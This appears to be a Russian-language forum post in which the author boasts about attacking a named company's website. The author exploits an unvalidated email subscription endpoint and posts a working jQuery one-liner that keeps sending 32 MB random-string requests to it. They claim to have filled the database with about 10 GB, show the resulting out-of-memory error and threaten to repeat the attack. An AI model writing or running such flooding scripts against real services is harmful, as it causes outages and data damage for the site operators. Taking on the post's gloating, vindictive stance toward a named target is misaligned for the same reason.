Шлём `Привет` кэшбери⁠⁠

Вижу пост

Не долго парясь нахожу в интернете их сайт http://gdc.group

Ооокей... Смотрим что там и как. И оказывается что фильтр почты, которую к ним на рассылку можно закинуть - фиктивный. Те если отправить руками то можно записать что угодно.

http://gdc.group/files/action/ajax.php?email=1

Методом перебора узнаём что под поле почты выделено 32милиионов(2^25) символов строка... А это 32 мегабайта.

Пишем небольшой скрипт

i=0; spam = () => { $.post('http://gdc.group/files/action/ajax.php', { email: Array(2**25).fill().map(()=>{ return String.fromCodePoint(~~(Math.random(1, 255) * 255)) }).join('') }, (a)=>{console.log(++i, a); spam();}); }; spam();

Хотя на деле лучше степень 20 гдето, потому как на лимите там памяти не хватает.

Ну и итого всё..) Память у сервиса кончилась, удачи разрабам разгребать говно и фиксить дыры..)

Как минимум гигов на 10 в базу я поднасрать успел, пока память не закончилась... Если ребутнут не пофиксив, продолжим...

Такие успешные парни, а найти разраба не из студентов не смогли =\

Теперь всегда так:

Fatal error: Allowed memory size of 268435456 bytes exhausted (tried to allocate 4304128 bytes) in /home/bitrix/ext_www/gdc.group/files/action/ajax.php on line 8

Ещё и битрикс... Фи...